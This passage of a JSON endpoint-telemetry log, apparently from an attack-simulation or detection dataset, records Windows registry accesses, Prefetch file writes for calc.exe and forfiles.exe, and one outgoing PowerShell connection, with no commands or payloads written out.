"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "timestamp": 131883574025410000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\ShowInSwitchers", - "registry_value": "ShowInSwitchers", - "timestamp": 131883574025410000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "timestamp": 131883574025410000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": 
"registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574025410000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574026000000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - 
"process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": 
"Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026360000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - 
"event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026360000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": 
"C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026480000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026480000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "file", - "file_name": "CALC.EXE-AC08706A.pf", - "file_path": "C:\\Windows\\Prefetch\\CALC.EXE-AC08706A.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574027320000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "FORFILES.EXE-BE58C675.pf", - "file_path": "C:\\Windows\\Prefetch\\FORFILES.EXE-BE58C675.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574027350000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "FORFILES.EXE-BE58C675.pf", - "file_path": "C:\\Windows\\Prefetch\\FORFILES.EXE-BE58C675.pf", - "pid": 
1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574027350000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_value": "Journal", - "timestamp": 131883574035550000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", - "registry_value": "Render", - "timestamp": 131883574035550000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "destination_address": "151.101.48.133", - "destination_port": "443", - "event_type": "network", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "protocol": "tcp", - "source_address": "192.168.162.134", - "source_port": "50511", - "subtype": "outgoing", - "timestamp": 131883574030630000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", - "registry_value": "Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\ShowInSwitchers", - "registry_value": "ShowInSwitchers", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - 
"process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PositionObject", - "registry_value": "PositionObject", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\Version", - "registry_value": "Version", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": 
